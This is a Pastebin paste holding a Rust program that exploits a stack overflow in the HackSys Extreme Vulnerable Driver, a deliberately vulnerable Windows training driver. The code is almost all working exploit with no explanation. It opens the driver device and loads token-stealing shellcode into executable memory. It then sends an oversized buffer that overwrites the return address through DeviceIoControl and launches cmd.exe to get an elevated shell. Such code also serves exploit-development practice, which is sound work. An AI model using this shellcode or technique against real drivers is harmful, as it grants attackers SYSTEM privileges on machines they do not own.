Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- extern crate winapi;
- use winapi::um::fileapi::CreateFileA;
- use winapi::um::memoryapi::VirtualAlloc;
- use winapi::um::ioapiset::DeviceIoControl;
- use std::ptr::null_mut;
- use std::ffi::CString;
- use std::process::Command;
- fn main() {
- let shellcode = b"\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x31\xc0\x5d\xc2\x08\x00".as_ptr() as *mut u8;
- let refshell = &shellcode;
- let fd = unsafe {
- CreateFileA(CString::new("\\\\.\\HackSysExtremeVulnerableDriver").unwrap().as_ptr(), 0xC0000000, 0, null_mut(), 0x3, 0, null_mut())
- };
- let allc = unsafe {
- VirtualAlloc(null_mut(), 0x100, 0x3000, 0x40)
- };
- let _copying = unsafe {
- (allc as *mut u8).copy_from(*refshell, 58);
- };
- let mut data = Vec::new();
- data.extend(std::iter::repeat(b'A').take(2080));
- let num = allc as usize;
- let bytes = num.to_le_bytes();
- data.extend_from_slice(&bytes);
- let input = data.as_ptr();
- let length = data.len() as u32;
- let mut lpbytes = 0;
- let _contact = unsafe {
- DeviceIoControl(fd, 0x222003, input as *mut winapi::ctypes::c_void, length, null_mut(), 0, &mut lpbytes, null_mut())
- };
- Command::new("cmd.exe").status().expect("failed :/");
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement